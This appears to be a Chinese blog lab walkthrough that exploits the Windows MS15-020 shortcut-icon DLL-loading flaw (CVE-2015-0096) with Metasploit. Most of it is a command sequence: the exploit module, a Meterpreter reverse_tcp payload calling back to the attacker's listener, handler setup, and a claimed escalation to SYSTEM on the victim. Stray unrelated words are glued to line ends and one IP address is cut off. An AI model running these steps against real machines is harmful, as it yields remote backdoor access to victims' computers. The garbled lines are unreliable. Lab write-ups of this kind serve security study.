名稱:Microsoft DLL植入遠程代碼執行漏洞(CVE-2015-0096)(MS15-020)linux
瞭解:Microsoft Windows沒有正確處理DLL文件的加載,存在遠程代碼執行漏洞,經過誘使用戶打開遠程WebDAV或SMB共享上的某些文件利用此漏洞,shell
成功利用後可致使加載任意庫。Windows使用.lnk來定義文件或者目錄的快捷方式,能夠使用.CPL文件來自定義圖標。問題是,在Windows中,圖標從模塊(或者可執行文件或動態連接庫)加載。windows
事實上,.cpl文件其實是DLL文件。由於攻擊者能夠定義哪些可執行模塊會被加載,攻擊者能夠利用.LNK文件來執行任意代碼。session
實驗環境:tcp
共享主機win7:192.168.1.3 spa
入侵主機linux:192.168.1.7orm
受害者主機XP:192.168.10blog
打開終端輸入命令:it
msfconsole //啓動msf(metasploit framework)io
search ms15 //搜索關鍵字相關漏洞
use exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader //漏洞利用模塊
info //查看漏洞相關信息
set payload windows/meterpreter/reverse_tcp //設置一個反彈shell
設置好參數,設置漏洞利用模塊列表的UNCHOST和UNCSHARE
set UNCHOST 192.168.1.3 //我設置爲個人另外一臺主機地址 就是你開着共享那臺機器的地址
set UNCSHARE share //設置共享文件的文件夾 這裏主機192.168.1.3在C盤下的share裏文件夾開啓了共享 提早建立好共享
set LHOST 192.168.1.7 //設置漏洞成功利用後後門鏈接的地址
exploit //執行漏洞
exploit後會發現生成了幾個文件,
咱們去生成的目錄下把文件拷貝到共享主機的共享文件夾下
複製到共享主機後,在啓動MSF進行配置剛纔的後門進行監聽...輸入命令
1. use exploit/multi/handler
2. set payload windows/meterpreter/reverse_tcp
3. set LHOST 192.168.1.7
4. exploit
受害者訪問共享後,
成功了觸發了漏洞
能夠發現入侵者這邊彈回來了一個回話session 1,簡單點說就是一個後門,這裏我順便提了下權,能夠看見system權限。
實驗結束,下班,關門,回家。